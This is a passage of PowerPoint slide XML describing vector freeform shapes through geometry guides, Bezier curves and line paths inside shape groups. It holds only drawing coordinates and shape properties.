                      <a:pt x="10" y="114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0" y="114"/>
                      <a:pt x="11" y="115"/>
                      <a:pt x="11" y="115"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="117"/>
                      <a:pt x="13" y="119"/>
                      <a:pt x="15" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="141"/>
                      <a:pt x="106" y="209"/>
                      <a:pt x="297" y="232"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="395" y="78"/>
                      <a:pt x="395" y="78"/>
                      <a:pt x="395" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="395" y="78"/>
                      <a:pt x="278" y="0"/>
                      <a:pt x="76" y="1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3" name="Freeform 1891"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4549" y="-1072"/>
                <a:ext cx="396" cy="449"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 140 w 168"/>
                  <a:gd name="T1" fmla="*/ 21 h 190"/>
                  <a:gd name="T2" fmla="*/ 33 w 168"/>
                  <a:gd name="T3" fmla="*/ 57 h 190"/>
                  <a:gd name="T4" fmla="*/ 28 w 168"/>
                  <a:gd name="T5" fmla="*/ 169 h 190"/>
                  <a:gd name="T6" fmla="*/ 134 w 168"/>
                  <a:gd name="T7" fmla="*/ 134 h 190"/>
                  <a:gd name="T8" fmla="*/ 140 w 168"/>
                  <a:gd name="T9" fmla="*/ 21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8"/>
                  <a:gd name="T16" fmla="*/ 0 h 190"/>
                  <a:gd name="T17" fmla="*/ 168 w 168"/>
                  <a:gd name="T18" fmla="*/ 190 h 1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8" h="190">
                    <a:moveTo>
                      <a:pt x="140" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="0"/>
                      <a:pt x="64" y="16"/>
                      <a:pt x="33" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="98"/>
                      <a:pt x="0" y="148"/>
                      <a:pt x="28" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="190"/>
                      <a:pt x="103" y="174"/>
                      <a:pt x="134" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="165" y="93"/>
                      <a:pt x="168" y="42"/>
                      <a:pt x="140" y="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4" name="Freeform 1892"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1790" y="-1703"/>
                <a:ext cx="5475" cy="796"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3848 w 5475"/>
                  <a:gd name="T1" fmla="*/ 0 h 796"/>
                  <a:gd name="T2" fmla="*/ 2286 w 5475"/>
                  <a:gd name="T3" fmla="*/ 319 h 796"/>
                  <a:gd name="T4" fmla="*/ 0 w 5475"/>
                  <a:gd name="T5" fmla="*/ 640 h 796"/>
                  <a:gd name="T6" fmla="*/ 543 w 5475"/>
                  <a:gd name="T7" fmla="*/ 796 h 796"/>
                  <a:gd name="T8" fmla="*/ 5475 w 5475"/>
                  <a:gd name="T9" fmla="*/ 433 h 796"/>
                  <a:gd name="T10" fmla="*/ 3848 w 5475"/>
                  <a:gd name="T11" fmla="*/ 0 h 7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75"/>
                  <a:gd name="T19" fmla="*/ 0 h 796"/>
                  <a:gd name="T20" fmla="*/ 5475 w 5475"/>
                  <a:gd name="T21" fmla="*/ 796 h 79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75" h="796">
                    <a:moveTo>
                      <a:pt x="3848" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2286" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="796"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5475" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384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5" name="Freeform 1893"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1570" y="-2723"/>
                <a:ext cx="2405" cy="238"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2405 w 2405"/>
                  <a:gd name="T1" fmla="*/ 229 h 238"/>
                  <a:gd name="T2" fmla="*/ 274 w 2405"/>
                  <a:gd name="T3" fmla="*/ 238 h 238"/>
                  <a:gd name="T4" fmla="*/ 0 w 2405"/>
                  <a:gd name="T5" fmla="*/ 156 h 238"/>
                  <a:gd name="T6" fmla="*/ 1547 w 2405"/>
                  <a:gd name="T7" fmla="*/ 0 h 238"/>
                  <a:gd name="T8" fmla="*/ 2405 w 2405"/>
                  <a:gd name="T9" fmla="*/ 229 h 2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05"/>
                  <a:gd name="T16" fmla="*/ 0 h 238"/>
                  <a:gd name="T17" fmla="*/ 2405 w 2405"/>
                  <a:gd name="T18" fmla="*/ 238 h 2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05" h="238">
                    <a:moveTo>
                      <a:pt x="2405" y="229"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="274" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1547" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2405" y="22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6" name="Freeform 1894"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2895" y="-4084"/>
                <a:ext cx="1531" cy="1484"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 648 w 648"/>
                  <a:gd name="T1" fmla="*/ 628 h 628"/>
                  <a:gd name="T2" fmla="*/ 646 w 648"/>
                  <a:gd name="T3" fmla="*/ 620 h 628"/>
                  <a:gd name="T4" fmla="*/ 190 w 648"/>
                  <a:gd name="T5" fmla="*/ 68 h 628"/>
                  <a:gd name="T6" fmla="*/ 0 w 648"/>
                  <a:gd name="T7" fmla="*/ 0 h 628"/>
                  <a:gd name="T8" fmla="*/ 122 w 648"/>
                  <a:gd name="T9" fmla="*/ 484 h 628"/>
                  <a:gd name="T10" fmla="*/ 648 w 648"/>
                  <a:gd name="T11" fmla="*/ 628 h 6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8"/>
                  <a:gd name="T19" fmla="*/ 0 h 628"/>
                  <a:gd name="T20" fmla="*/ 648 w 648"/>
                  <a:gd name="T21" fmla="*/ 628 h 62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8" h="628">
                    <a:moveTo>
                      <a:pt x="648" y="628"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="648" y="628"/>
                      <a:pt x="648" y="622"/>
                      <a:pt x="646" y="620"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="618" y="588"/>
                      <a:pt x="285" y="214"/>
                      <a:pt x="190" y="6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2" y="484"/>
                      <a:pt x="122" y="484"/>
                      <a:pt x="122" y="484"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="648" y="62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827" name="Group 14534"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="7545489" y="2120261"/>
              <a:ext cx="935038" cy="296863"/>
              <a:chOff x="342" y="-467"/>
              <a:chExt cx="13108" cy="4140"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="828" name="Freeform 14535"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="7900" y="797"/>
                <a:ext cx="1276" cy="693"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 324"/>
                  <a:gd name="T1" fmla="*/ 11 h 175"/>
                  <a:gd name="T2" fmla="*/ 66 w 324"/>
                  <a:gd name="T3" fmla="*/ 11 h 175"/>
                  <a:gd name="T4" fmla="*/ 20 w 324"/>
                  <a:gd name="T5" fmla="*/ 38 h 175"/>
                  <a:gd name="T6" fmla="*/ 9 w 324"/>
                  <a:gd name="T7" fmla="*/ 98 h 175"/>
                  <a:gd name="T8" fmla="*/ 9 w 324"/>
                  <a:gd name="T9" fmla="*/ 98 h 175"/>
                  <a:gd name="T10" fmla="*/ 10 w 324"/>
                  <a:gd name="T11" fmla="*/ 99 h 175"/>
                  <a:gd name="T12" fmla="*/ 13 w 324"/>
                  <a:gd name="T13" fmla="*/ 103 h 175"/>
                  <a:gd name="T14" fmla="*/ 272 w 324"/>
                  <a:gd name="T15" fmla="*/ 175 h 175"/>
                  <a:gd name="T16" fmla="*/ 324 w 324"/>
                  <a:gd name="T17" fmla="*/ 92 h 175"/>
                  <a:gd name="T18" fmla="*/ 66 w 324"/>
                  <a:gd name="T19" fmla="*/ 11 h 1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24"/>
                  <a:gd name="T31" fmla="*/ 0 h 175"/>
                  <a:gd name="T32" fmla="*/ 324 w 324"/>
                  <a:gd name="T33" fmla="*/ 175 h 1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24" h="175">
                    <a:moveTo>
                      <a:pt x="66" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="11"/>
                      <a:pt x="66" y="11"/>
                      <a:pt x="66" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="11"/>
                      <a:pt x="33" y="21"/>
                      <a:pt x="20" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="59"/>
                      <a:pt x="0" y="83"/>
                      <a:pt x="9" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="98"/>
                      <a:pt x="9" y="98"/>
                      <a:pt x="9" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="98"/>
                      <a:pt x="10" y="98"/>
                      <a:pt x="10" y="99"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="101"/>
                      <a:pt x="12" y="102"/>
                      <a:pt x="13" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="121"/>
                      <a:pt x="107" y="155"/>
                      <a:pt x="272" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="324" y="92"/>
                      <a:pt x="324" y="92"/>
                      <a:pt x="324" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="324" y="92"/>
                      <a:pt x="239" y="0"/>
                      <a:pt x="66" y="1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9" name="Freeform 14536"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8862" y="1102"/>
                <a:ext cx="362" cy="411"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 77 w 92"/>
                  <a:gd name="T1" fmla="*/ 12 h 104"/>
                  <a:gd name="T2" fmla="*/ 19 w 92"/>
                  <a:gd name="T3" fmla="*/ 31 h 104"/>
                  <a:gd name="T4" fmla="*/ 16 w 92"/>
                  <a:gd name="T5" fmla="*/ 93 h 104"/>
                  <a:gd name="T6" fmla="*/ 74 w 92"/>
                  <a:gd name="T7" fmla="*/ 73 h 104"/>
                  <a:gd name="T8" fmla="*/ 77 w 92"/>
                  <a:gd name="T9" fmla="*/ 12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2"/>
                  <a:gd name="T16" fmla="*/ 0 h 104"/>
                  <a:gd name="T17" fmla="*/ 92 w 92"/>
                  <a:gd name="T18" fmla="*/ 104 h 1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2" h="104">
                    <a:moveTo>
                      <a:pt x="77" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="0"/>
                      <a:pt x="36" y="9"/>
                      <a:pt x="19" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="54"/>
                      <a:pt x="0" y="81"/>
                      <a:pt x="16" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="104"/>
                      <a:pt x="57" y="95"/>
                      <a:pt x="74" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="51"/>
                      <a:pt x="92" y="23"/>
                      <a:pt x="77" y="12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0" name="Freeform 14537"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3583" y="2440"/>
                <a:ext cx="1276" cy="688"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 324"/>
                  <a:gd name="T1" fmla="*/ 11 h 175"/>
                  <a:gd name="T2" fmla="*/ 66 w 324"/>
                  <a:gd name="T3" fmla="*/ 11 h 175"/>
                  <a:gd name="T4" fmla="*/ 20 w 324"/>
                  <a:gd name="T5" fmla="*/ 38 h 175"/>
                  <a:gd name="T6" fmla="*/ 9 w 324"/>
                  <a:gd name="T7" fmla="*/ 98 h 175"/>
                  <a:gd name="T8" fmla="*/ 9 w 324"/>
                  <a:gd name="T9" fmla="*/ 98 h 175"/>
                  <a:gd name="T10" fmla="*/ 10 w 324"/>
                  <a:gd name="T11" fmla="*/ 99 h 175"/>
                  <a:gd name="T12" fmla="*/ 13 w 324"/>
                  <a:gd name="T13" fmla="*/ 103 h 175"/>
                  <a:gd name="T14" fmla="*/ 272 w 324"/>
                  <a:gd name="T15" fmla="*/ 175 h 175"/>
                  <a:gd name="T16" fmla="*/ 324 w 324"/>
                  <a:gd name="T17" fmla="*/ 92 h 175"/>
                  <a:gd name="T18" fmla="*/ 66 w 324"/>
                  <a:gd name="T19" fmla="*/ 11 h 1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24"/>
                  <a:gd name="T31" fmla="*/ 0 h 175"/>
                  <a:gd name="T32" fmla="*/ 324 w 324"/>
                  <a:gd name="T33" fmla="*/ 175 h 1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24" h="175">
                    <a:moveTo>
                      <a:pt x="66" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="11"/>
                      <a:pt x="66" y="11"/>
                      <a:pt x="66" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="11"/>
                      <a:pt x="33" y="21"/>
                      <a:pt x="20" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="59"/>
                      <a:pt x="0" y="83"/>
                      <a:pt x="9" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="98"/>
                      <a:pt x="9" y="98"/>
                      <a:pt x="9" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="98"/>
                      <a:pt x="10" y="99"/>
                      <a:pt x="10" y="99"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="101"/>
                      <a:pt x="12" y="102"/>
                      <a:pt x="13" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="121"/>
                      <a:pt x="107" y="155"/>
                      <a:pt x="272" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="324" y="92"/>
                      <a:pt x="324" y="92"/>
                      <a:pt x="324" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="324" y="92"/>
                      <a:pt x="239" y="0"/>
                      <a:pt x="66" y="1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1" name="Freeform 14538"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4545" y="2746"/>
                <a:ext cx="362" cy="408"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 77 w 92"/>
                  <a:gd name="T1" fmla="*/ 11 h 103"/>
                  <a:gd name="T2" fmla="*/ 19 w 92"/>
                  <a:gd name="T3" fmla="*/ 30 h 103"/>
                  <a:gd name="T4" fmla="*/ 16 w 92"/>
                  <a:gd name="T5" fmla="*/ 92 h 103"/>
                  <a:gd name="T6" fmla="*/ 74 w 92"/>
                  <a:gd name="T7" fmla="*/ 72 h 103"/>
                  <a:gd name="T8" fmla="*/ 77 w 92"/>
                  <a:gd name="T9" fmla="*/ 11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2"/>
                  <a:gd name="T16" fmla="*/ 0 h 103"/>
                  <a:gd name="T17" fmla="*/ 92 w 92"/>
                  <a:gd name="T18" fmla="*/ 103 h 10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2" h="103">
                    <a:moveTo>
                      <a:pt x="77" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="0"/>
                      <a:pt x="36" y="8"/>
                      <a:pt x="19" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="53"/>
                      <a:pt x="0" y="80"/>
                      <a:pt x="16" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="103"/>
                      <a:pt x="57" y="94"/>
                      <a:pt x="74" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="50"/>
                      <a:pt x="92" y="23"/>
                      <a:pt x="77" y="11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2" name="Freeform 14539"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5729" y="2786"/>
                <a:ext cx="357" cy="353"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 75 w 90"/>
                  <a:gd name="T1" fmla="*/ 25 h 90"/>
                  <a:gd name="T2" fmla="*/ 29 w 90"/>
                  <a:gd name="T3" fmla="*/ 5 h 90"/>
                  <a:gd name="T4" fmla="*/ 29 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 90"/>
                  <a:gd name="T6" fmla="*/ 0 w 90"/>
                  <a:gd name="T7" fmla="*/ 14 h 90"/>
                  <a:gd name="T8" fmla="*/ 41 w 90"/>
                  <a:gd name="T9" fmla="*/ 90 h 90"/>
                  <a:gd name="T10" fmla="*/ 69 w 90"/>
                  <a:gd name="T11" fmla="*/ 81 h 90"/>
                  <a:gd name="T12" fmla="*/ 69 w 90"/>
                  <a:gd name="T13" fmla="*/ 81 h 90"/>
                  <a:gd name="T14" fmla="*/ 77 w 90"/>
                  <a:gd name="T15" fmla="*/ 77 h 90"/>
                  <a:gd name="T16" fmla="*/ 75 w 90"/>
                  <a:gd name="T17" fmla="*/ 25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90"/>
                  <a:gd name="T29" fmla="*/ 90 w 90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90">
                    <a:moveTo>
                      <a:pt x="75" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="8"/>
                      <a:pt x="43" y="0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1" y="90"/>
                      <a:pt x="41" y="90"/>
                      <a:pt x="41" y="90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2" y="80"/>
                      <a:pt x="75" y="79"/>
                      <a:pt x="77" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="67"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="75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3" name="Freeform 14540"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5663" y="2814"/>
                <a:ext cx="311" cy="351"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 79"/>
                  <a:gd name="T1" fmla="*/ 79 h 89"/>
                  <a:gd name="T2" fmla="*/ 15 w 79"/>
                  <a:gd name="T3" fmla="*/ 62 h 89"/>
                  <a:gd name="T4" fmla="*/ 13 w 79"/>
                  <a:gd name="T5" fmla="*/ 10 h 89"/>
                  <a:gd name="T6" fmla="*/ 63 w 79"/>
                  <a:gd name="T7" fmla="*/ 26 h 89"/>
                  <a:gd name="T8" fmla="*/ 66 w 79"/>
                  <a:gd name="T9" fmla="*/ 7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89"/>
                  <a:gd name="T17" fmla="*/ 79 w 79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89">
                    <a:moveTo>
                      <a:pt x="66" y="79"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="89"/>
                      <a:pt x="30" y="82"/>
                      <a:pt x="15" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="43"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="48" y="7"/>
                      <a:pt x="63" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="46"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="66" y="79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4" name="Freeform 14541"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5772" y="2940"/>
                <a:ext cx="88" cy="100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 22"/>
                  <a:gd name="T1" fmla="*/ 22 h 25"/>
                  <a:gd name="T2" fmla="*/ 5 w 22"/>
                  <a:gd name="T3" fmla="*/ 17 h 25"/>
                  <a:gd name="T4" fmla="*/ 4 w 22"/>
                  <a:gd name="T5" fmla="*/ 3 h 25"/>
                  <a:gd name="T6" fmla="*/ 18 w 22"/>
                  <a:gd name="T7" fmla="*/ 8 h 25"/>
                  <a:gd name="T8" fmla="*/ 18 w 22"/>
                  <a:gd name="T9" fmla="*/ 2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25"/>
                  <a:gd name="T17" fmla="*/ 22 w 22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25">
                    <a:moveTo>
                      <a:pt x="18" y="22"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="25"/>
                      <a:pt x="9" y="23"/>
                      <a:pt x="5" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="12"/>
                      <a:pt x="0" y="6"/>
                      <a:pt x="4" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="14" y="2"/>
                      <a:pt x="18" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="13"/>
                      <a:pt x="22" y="19"/>
                      <a:pt x="18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5" name="Freeform 14542"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5800" y="2971"/>
                <a:ext cx="32" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 8"/>
                  <a:gd name="T1" fmla="*/ 8 h 9"/>
                  <a:gd name="T2" fmla="*/ 2 w 8"/>
                  <a:gd name="T3" fmla="*/ 6 h 9"/>
                  <a:gd name="T4" fmla="*/ 2 w 8"/>
                  <a:gd name="T5" fmla="*/ 1 h 9"/>
                  <a:gd name="T6" fmla="*/ 6 w 8"/>
                  <a:gd name="T7" fmla="*/ 3 h 9"/>
                  <a:gd name="T8" fmla="*/ 7 w 8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9"/>
                  <a:gd name="T17" fmla="*/ 8 w 8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9">
                    <a:moveTo>
                      <a:pt x="7" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="9"/>
                      <a:pt x="3" y="8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8" y="5"/>
                      <a:pt x="8" y="7"/>
                      <a:pt x="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6" name="Freeform 14543"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5763" y="2868"/>
                <a:ext cx="97" cy="140"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 24"/>
                  <a:gd name="T1" fmla="*/ 0 h 35"/>
                  <a:gd name="T2" fmla="*/ 1 w 24"/>
                  <a:gd name="T3" fmla="*/ 30 h 35"/>
                  <a:gd name="T4" fmla="*/ 9 w 24"/>
                  <a:gd name="T5" fmla="*/ 34 h 35"/>
                  <a:gd name="T6" fmla="*/ 19 w 24"/>
                  <a:gd name="T7" fmla="*/ 33 h 35"/>
                  <a:gd name="T8" fmla="*/ 24 w 24"/>
                  <a:gd name="T9" fmla="*/ 4 h 35"/>
                  <a:gd name="T10" fmla="*/ 6 w 24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35"/>
                  <a:gd name="T20" fmla="*/ 24 w 24"/>
                  <a:gd name="T21" fmla="*/ 35 h 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35">
                    <a:moveTo>
                      <a:pt x="6" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="30"/>
                      <a:pt x="1" y="30"/>
                      <a:pt x="1" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="31"/>
                      <a:pt x="4" y="33"/>
                      <a:pt x="9" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="35"/>
                      <a:pt x="19" y="34"/>
                      <a:pt x="19" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="4"/>
                      <a:pt x="24" y="4"/>
                      <a:pt x="24" y="4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7" name="Freeform 14544"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5769" y="2763"/>
                <a:ext cx="131" cy="125"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 32"/>
                  <a:gd name="T2" fmla="*/ 0 w 33"/>
                  <a:gd name="T3" fmla="*/ 24 h 32"/>
                  <a:gd name="T4" fmla="*/ 14 w 33"/>
                  <a:gd name="T5" fmla="*/ 30 h 32"/>
                  <a:gd name="T6" fmla="*/ 29 w 33"/>
                  <a:gd name="T7" fmla="*/ 29 h 32"/>
                  <a:gd name="T8" fmla="*/ 33 w 33"/>
                  <a:gd name="T9" fmla="*/ 5 h 32"/>
                  <a:gd name="T10" fmla="*/ 5 w 33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3"/>
                  <a:gd name="T19" fmla="*/ 0 h 32"/>
                  <a:gd name="T20" fmla="*/ 33 w 33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3" h="32">
                    <a:moveTo>
                      <a:pt x="5" y="0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0" y="26"/>
                      <a:pt x="6" y="29"/>
                      <a:pt x="14" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="32"/>
                      <a:pt x="28" y="31"/>
                      <a:pt x="29" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="5"/>
                      <a:pt x="33" y="5"/>
                      <a:pt x="33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8" name="Freeform 14545"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5521" y="2843"/>
                <a:ext cx="354" cy="354"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 74 w 90"/>
                  <a:gd name="T1" fmla="*/ 25 h 90"/>
                  <a:gd name="T2" fmla="*/ 29 w 90"/>
                  <a:gd name="T3" fmla="*/ 5 h 90"/>
                  <a:gd name="T4" fmla="*/ 29 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 90"/>
                  <a:gd name="T6" fmla="*/ 0 w 90"/>
                  <a:gd name="T7" fmla="*/ 15 h 90"/>
                  <a:gd name="T8" fmla="*/ 41 w 90"/>
                  <a:gd name="T9" fmla="*/ 90 h 90"/>
                  <a:gd name="T10" fmla="*/ 69 w 90"/>
                  <a:gd name="T11" fmla="*/ 81 h 90"/>
                  <a:gd name="T12" fmla="*/ 69 w 90"/>
                  <a:gd name="T13" fmla="*/ 81 h 90"/>
                  <a:gd name="T14" fmla="*/ 77 w 90"/>
                  <a:gd name="T15" fmla="*/ 78 h 90"/>
                  <a:gd name="T16" fmla="*/ 74 w 90"/>
                  <a:gd name="T17" fmla="*/ 25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90"/>
                  <a:gd name="T29" fmla="*/ 90 w 90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90">
                    <a:moveTo>
                      <a:pt x="74" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="8"/>
                      <a:pt x="42" y="0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1" y="90"/>
                      <a:pt x="41" y="90"/>
                      <a:pt x="41" y="90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2" y="81"/>
                      <a:pt x="75" y="79"/>
                      <a:pt x="77" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
